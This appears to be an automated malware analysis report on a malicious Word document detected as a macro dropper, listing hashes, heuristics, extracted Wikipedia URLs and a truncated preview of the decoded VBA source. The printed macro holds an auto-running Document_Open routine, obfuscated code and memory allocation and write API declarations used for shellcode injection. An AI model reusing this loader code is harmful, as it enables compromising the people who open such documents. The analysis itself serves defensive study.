Office (OLE) malware analysis — malicious · 67551c7547012bc5

MALICIOUS

Office (OLE)

363.0 KB Created: 2018-01-25 16:05:00 Authoring application: Microsoft Office Word First seen: 2018-02-07

MD5: 55d5e878fe40e802a7eae881444b73a4 SHA-1: 0a7725fd4461c6d2fd5e687d9ff8feff1671e7aa SHA-256: 67551c7547012bc5a094f7793d8f0bffd0df64bda06132a965d0a4e8b88545b2

122 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Document_Open macro, which is a common technique for initial execution. The ClamAV heuristic identifies it as a "Doc.Dropper.Agent", suggesting its primary function is to download and execute additional malware. While the VBA code is obfuscated, the presence of the Document_Open macro and the dropper heuristic strongly indicate a malicious intent to compromise the user's system.

Heuristics 4

ClamAV: Doc.Dropper.Agent-6435560-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6435560-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://en.wikipedia.org/wiki/Wikipedia:FA In document text (OLE body)
- https://en.wikipedia.org/wiki/Elcor,_MinnesotaIn document text (OLE body)
- https://en.wikipedia.org/wiki/Mesabi_RangeIn document text (OLE body)
- https://en.wikipedia.org/wiki/Golden_jackalIn document text (OLE body)
- https://en.wikipedia.org/wiki/Operation_GrappleIn document text (OLE body)
- https://en.wikipedia.org/wiki/Nuclear_testIn document text (OLE body)
- https://en.wikipedia.org/wiki/Hydrogen_bombIn document text (OLE body)
- https://en.wikipedia.org/wiki/RSPB_MinsmereIn document text (OLE body)
- https://en.wikipedia.org/wiki/More_Hall_AnnexIn document text (OLE body)
- https://en.wikipedia.org/wiki/Greek_battleship_SalamisIn document text (OLE body)
- https://en.wikipedia.org/wiki/File:Tottenham_Outrage_in_The_Illustrated_London_News,_30_January_1909_(retouched).jpgIn document text (OLE body)
- https://upload.wikimedia.org/wikipedia/commons/thumb/4/40/Tottenham_Outrage_in_The_Illustrated_London_News%2C_30_January_1909_%28retouched%29.jpg/300px-Tottenham_Outrage_in_The_Illustrated_London_News%2C_30_January_1909_%28retouched%29.jpgIn document text (OLE body)
- https://en.wikipedia.org/wiki/The_Illustrated_London_NewsIn document text (OLE body)
- https://en.wikipedia.org/wiki/Cyrus_CuneoIn document text (OLE body)
- https://en.wikipedia.org/wiki/Tottenham_outrageIn document text (OLE body)
- https://en.wikipedia.org/wiki/Lancashire_Fusiliers_War_MemorialIn document text (OLE body)
- https://en.wikipedia.org/wiki/Kate_WinsletIn document text (OLE body)
- https://en.wikipedia.org/wiki/List_of_people_who_have_won_Academy,_Emmy,_Grammy,_and_Tony_AwardsIn document text (OLE body)
- https://en.wikipedia.org/wiki/Southern_boobookIn document text (OLE body)
- https://en.wikipedia.org/wiki/Arthur_SullivanIn document text (OLE body)
- https://en.wikipedia.org/wiki/Gilbert_and_SullivanIn document text (OLE body)
- https://en.wikipedia.org/wiki/H.M.S._PinaforeIn document text (OLE body)
- https://en.wikipedia.org/wiki/The_Pirates_of_PenzanceIn document text (OLE body)
- https://en.wikipedia.org/wiki/The_MikadoIn document text (OLE body)
- https://en.wikipedia.org/wiki/Wikipedia:Featured_article_candidates/Elcor,_Minnesota/archive1In document text (OLE body)
- https://en.wikipedia.org/wiki/User:DrGregMNIn document text (OLE body)
- https://en.wikipedia.org/wiki/Ghost_townIn document text (OLE body)
- https://en.wikipedia.org/wiki/U.S._stateIn document text (OLE body)
- https://en.wikipedia.org/wiki/MinnesotaIn document text (OLE body)
- https://en.wikipedia.org/wiki/Seven_Iron_BrothersIn document text (OLE body)
- https://en.wikipedia.org/wiki/Wikipedia:Featured_article_candidates/Golden_jackal/archive1In document text (OLE body)
- https://en.wikipedia.org/wiki/User:William_HarrisIn document text (OLE body)
- https://en.wikipedia.org/wiki/Evolution_of_the_wolfIn document text (OLE body)
- https://en.wikipedia.org/wiki/Southeast_EuropeIn document text (OLE body)
- https://en.wikipedia.org/wiki/Southwest_AsiaIn document text (OLE body)
- https://en.wikipedia.org/wiki/South_AsiaIn document text (OLE body)
- https://en.wikipedia.org/wiki/Southeast_AsiaIn document text (OLE body)
- https://en.wikipedia.org/wiki/Arabian_wolfIn document text (OLE body)
- https://en.wikipedia.org/wiki/Gray_wolfIn document text (OLE body)
- https://en.wikipedia.org/wiki/Least_concernIn document text (OLE body)
- https://en.wikipedia.org/wiki/IUCN_Red_ListIn document text (OLE body)
- https://en.wikipedia.org/wiki/British_hydrogen_bomb_programmeIn document text (OLE body)
- https://en.wikipedia.org/wiki/Wikipedia:Featured_article_candidates/British_hydrogen_bomb_programme/archive1In document text (OLE body)
- https://en.wikipedia.org/wiki/User:Hawkeye7In document text (OLE body)
- https://en.wikipedia.org/wiki/Hydrogen_bombsIn document text (OLE body)
- https://en.wikipedia.org/wiki/Nuclear_weapon_yieldIn document text (OLE body)
- https://en.wikipedia.org/wiki/Nuclear_fusionIn document text (OLE body)
- https://en.wikipedia.org/wiki/Sputnik_crisisIn document text (OLE body)
- https://en.wikipedia.org/wiki/1958_US%E2%80%93UK_Mutual_Defence_AgreementIn document text (OLE body)
- https://en.wikipedia.org/wiki/Wikipedia:Featured_article_candidates/RSPB_Minsmere/archive1In document text (OLE body)
+224 more URL(s)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10341 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10341 bytes
SHA-256: `6f931fa96f824ab5f0292ce08b43434a66994ff5c85128166757575faa941005`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Dim age As String Dim skeptical As Byte forsake = "parsimoniousness" grail = "lygaeidae" eyesonly juno = 38 + 20 Pmt 0, juno, 14012, 55643, 3 End Sub Attribute VB_Name = "ahtungs" #If (60 - 63 + 403 + 33 - 81 + 348) > ((58 - 2 + 264) - (57 - 48 + 531) * 1) And ((38 - 112 + 102) - (45 - 64 + 47)) * 2 < (Win64) Then Public Declare PtrSafe Function tace _ Lib "Ntdll " Alias _ "NtWriteVirtualMemory" (ByVal thinker As Any, ByVal accredit As Any, ByVal husking As Any, ByVal foh As Any, ByVal ostreidae As Any) As LongPtr Public Declare PtrSafe Function awakened _ Lib "ntdll " Alias _ "NtAllocateVirtualMemory" (pirate As LongPtr, equerry As LongPtr, ByVal soil As LongPtr, untutoredByVal As LongPtr, godmother As LongPtr, ByVal ayrshire As LongPtr) As LongPtr Public Declare PtrSafe Function condole _ Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (bandit As Any, ByVal duster As Any, ByVal catfish As Any, ByVal mammography As Any, ByVal diathermanous As Any, ByVal groom As Any, ByVal clustered As Any) As Long #End If Function bouillon(percophidae, malocclusion, ballup) Select Case ballup Case 43 + (10 / 2 - 5) bouillon = percophidae \ malocclusion Case 53 + (5 - 3) / 2 - 1 bouillon = percophidae And malocclusion Case 61 + (56 / 7 - 4 * 2) bouillon = percophidae * malocclusion End Select End Function Function DynamicBubble(pritor, fortur) Dim tempVar As Integer Dim anotherIteration As Boolean Dim I As Integer remedy = pritor Dim arraySize As Integer Dim myArray() As Integer For I = remedy To fortur areca(remedy) = remedy - 65 remedy = remedy + 1 If remedy > fortur Then Exit For Next DynamicBubble = remedy End Function Attribute VB_Name = "barbarian" #If (117 - 10 + 293 + 56 - 3 + 247) > ((107 - 45 + 258) - (63 - 66 + 543) * 1) And Not ((120 - 37 - 55) - (101 - 36 - 37)) * 2 < (Win64) Then Public Declare Function condole _ Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (sweetbrier As Any, ByVal supine As Any, ByVal germfree As Any, ByVal oligarch As Any, ByVal ote As Any, ByVal harshness As Any, ByVal semel As Any) As Long #End If #If (117 - 10 + 293 + 56 - 3 + 247) > ((107 - 45 + 258) - (63 - 66 + 543) * 1) And Not ((120 - 37 - 55) - (101 - 36 - 37)) * 2 < (Win64) Then Public Declare Function tace _ Lib "ntdll" Alias _ "NtWriteVirtualMemory" (ByVal andersen As Any, ByVal underwear As Any, ByVal reticule As Any, ByVal angled As Any, ByVal limey As Any) As Long #End If Function dormie() Dim areca(255) As Byte remedy = 70 - 76 + 71 For I = remedy To 90 + 1 areca(remedy) = remedy - 65 remedy = remedy + 1 If remedy > 90 + 1 Then Exit For Next remedy = 40 + 8 For I = remedy To 50 + 8 areca(remedy) = remedy + 4 remedy = remedy + 1 If remedy > 50 + 8 Then Exit For Next remedy = 90 + 7 For I = remedy To 120 + 3 areca(remedy) = remedy - 71 remedy = remedy + 1 If remedy > 120 + 3 Then Exit For Next areca(47) = 60 + 3 remedy = 40 + 3 areca(remedy) = 60 + 2 dormie = areca End Function Attribute VB_Name = "triggerhappy" Attribute VB_Base = "0{21F5C512-296B-43C7-AF6C-64191BB0A924}{9B470B8D-9AB0-4079-AA7F-2B63FE385F48}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub scrupulously_Change() End Sub Attribute VB_Name = "foxitr" #If (117 - 10 + 293 + 56 - 3 + 247) > ((107 - 45 + 258) - (63 - 66 + 543) * 1) And Not ((120 - 37 - 55) - (101 - 36 - 37)) * 2 < (Win64) Then Public Declare Function awakened Lib _ "ntdll" Alias _ "NtAllocateVirtualMemory" (polaris As Long, hilum As Long, ByVal thickness As Long, beneluxByVal As Long, scupper As Long, ByVal con ... (truncated)

SHA-256: 6f931fa96f824ab5f0292ce08b43434a66994ff5c85128166757575faa941005

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Open()
Dim age As String
Dim skeptical As Byte
forsake = "parsimoniousness"
grail = "lygaeidae"
eyesonly
juno = 38 + 20
 Pmt 0, juno, 14012, 55643, 3
End Sub



Attribute VB_Name = "ahtungs"
#If (60 - 63 + 403 + 33 - 81 + 348) > ((58 - 2 + 264) - (57 - 48 + 531) * 1) And ((38 - 112 + 102) - (45 - 64 + 47)) * 2 < (Win64) Then
Public Declare PtrSafe Function tace _
Lib "Ntdll    " Alias _
"NtWriteVirtualMemory" (ByVal thinker As Any, ByVal accredit As Any, ByVal husking As Any, ByVal foh As Any, ByVal ostreidae As Any) As LongPtr
Public Declare PtrSafe Function awakened _
Lib "ntdll   " Alias _
"NtAllocateVirtualMemory" (pirate As LongPtr, equerry As LongPtr, ByVal soil As LongPtr, untutoredByVal As LongPtr, godmother As LongPtr, ByVal ayrshire As LongPtr) As LongPtr
Public Declare PtrSafe Function condole _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (bandit As Any, ByVal duster As Any, ByVal catfish As Any, ByVal mammography As Any, ByVal diathermanous As Any, ByVal groom As Any, ByVal clustered As Any) As Long
#End If
Function bouillon(percophidae, malocclusion, ballup)
Select Case ballup
Case 43 + (10 / 2 - 5)
bouillon = percophidae \ malocclusion
Case 53 + (5 - 3) / 2 - 1
bouillon = percophidae And malocclusion
Case 61 + (56 / 7 - 4 * 2)
bouillon = percophidae * malocclusion
End Select
End Function
Function DynamicBubble(pritor, fortur)
Dim tempVar As Integer
Dim anotherIteration As Boolean
Dim I As Integer
remedy = pritor
Dim arraySize As Integer
Dim myArray() As Integer
For I = remedy To fortur
areca(remedy) = remedy - 65
remedy = remedy + 1
If remedy > fortur Then Exit For
Next
DynamicBubble = remedy
End Function






Attribute VB_Name = "barbarian"
#If (117 - 10 + 293 + 56 - 3 + 247) > ((107 - 45 + 258) - (63 - 66 + 543) * 1) And Not ((120 - 37 - 55) - (101 - 36 - 37)) * 2 < (Win64) Then
Public Declare Function condole _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (sweetbrier As Any, ByVal supine As Any, ByVal germfree As Any, ByVal oligarch As Any, ByVal ote As Any, ByVal harshness As Any, ByVal semel As Any) As Long
#End If
#If (117 - 10 + 293 + 56 - 3 + 247) > ((107 - 45 + 258) - (63 - 66 + 543) * 1) And Not ((120 - 37 - 55) - (101 - 36 - 37)) * 2 < (Win64) Then
Public Declare Function tace _
Lib "ntdll" Alias _
"NtWriteVirtualMemory" (ByVal andersen As Any, ByVal underwear As Any, ByVal reticule As Any, ByVal angled As Any, ByVal limey As Any) As Long
#End If
Function dormie()
Dim areca(255) As Byte
remedy = 70 - 76 + 71
For I = remedy To 90 + 1
areca(remedy) = remedy - 65
remedy = remedy + 1
If remedy > 90 + 1 Then Exit For
Next
remedy = 40 + 8
For I = remedy To 50 + 8
areca(remedy) = remedy + 4
remedy = remedy + 1
If remedy > 50 + 8 Then Exit For
Next
remedy = 90 + 7
For I = remedy To 120 + 3
areca(remedy) = remedy - 71
remedy = remedy + 1
If remedy > 120 + 3 Then Exit For
Next
areca(47) = 60 + 3
remedy = 40 + 3
areca(remedy) = 60 + 2
dormie = areca
End Function




Attribute VB_Name = "triggerhappy"
Attribute VB_Base = "0{21F5C512-296B-43C7-AF6C-64191BB0A924}{9B470B8D-9AB0-4079-AA7F-2B63FE385F48}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub scrupulously_Change()

End Sub

Attribute VB_Name = "foxitr"
#If (117 - 10 + 293 + 56 - 3 + 247) > ((107 - 45 + 258) - (63 - 66 + 543) * 1) And Not ((120 - 37 - 55) - (101 - 36 - 37)) * 2 < (Win64) Then
Public Declare Function awakened Lib _
"ntdll" Alias _
"NtAllocateVirtualMemory" (polaris As Long, hilum As Long, ByVal thickness As Long, beneluxByVal As Long, scupper As Long, ByVal con
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.